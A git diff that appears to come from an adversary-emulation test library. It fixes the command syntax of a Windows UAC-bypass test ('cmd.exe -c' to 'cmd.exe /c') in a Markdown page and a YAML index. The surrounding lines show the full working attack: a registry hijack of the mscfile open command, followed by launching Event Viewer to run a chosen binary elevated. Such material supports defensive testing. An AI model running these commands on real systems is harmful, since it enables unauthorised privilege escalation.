diff --git a/atomics/T1088/T1088.md b/atomics/T1088/T1088.md index c9351291..45b94964 100644 --- a/atomics/T1088/T1088.md +++ b/atomics/T1088/T1088.md @@ -37,7 +37,7 @@ Bypasses User Account Control using Event Viewer and a relevant Windows Registry #### Run it with `command_prompt`! ``` reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f -cmd.exe -c eventvwr.msc +cmd.exe /c eventvwr.msc ```

diff --git a/atomics/index.yaml b/atomics/index.yaml index 5d70c721..317d95b1 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -4209,7 +4209,7 @@ defense-evasion: name: command_prompt command: | reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f - cmd.exe -c eventvwr.msc + cmd.exe /c eventvwr.msc - name: Bypass UAC using Event Viewer - PowerShell description: 'PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ @@ -9592,7 +9592,7 @@ privilege-escalation: name: command_prompt command: | reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f - cmd.exe -c eventvwr.msc + cmd.exe /c eventvwr.msc - name: Bypass UAC using Event Viewer - PowerShell description: 'PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/